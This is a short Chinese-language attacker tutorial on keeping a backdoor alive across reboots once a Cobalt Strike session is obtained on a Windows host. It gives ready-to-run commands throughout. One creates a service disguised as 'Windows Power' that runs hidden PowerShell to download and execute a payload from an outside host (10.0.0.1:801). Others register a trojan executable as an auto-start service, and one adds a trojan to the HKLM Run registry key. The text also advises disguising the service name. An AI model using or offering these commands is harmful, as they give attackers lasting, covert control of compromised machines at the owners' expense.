cobalt strike开机自启动后门

前提：拿到cobalt strike的session

设置开机自启动服务

使用sc命令创建服务

sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1:801/a'))\""

服务名可以伪装一下，binpath= 后面有个空格

将服务设置为自启动

sc config "Windows Power" start= auto

设置服务的描述

sc description "Windows Power" "windows auto service"

启动服务

net start "Windows Power"

删除服务

sc delete "Windows Power"

将exe木马添加到自启动服务中

sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"

sc description "server power" "description" 设置服务的描述字符串

sc config "server power" start= auto 设置这个服务为自动启动

net start "server power" 启动服务 

通过注册表设置开机启动项

设置开机启动项，往注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run添加木马程序路径

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f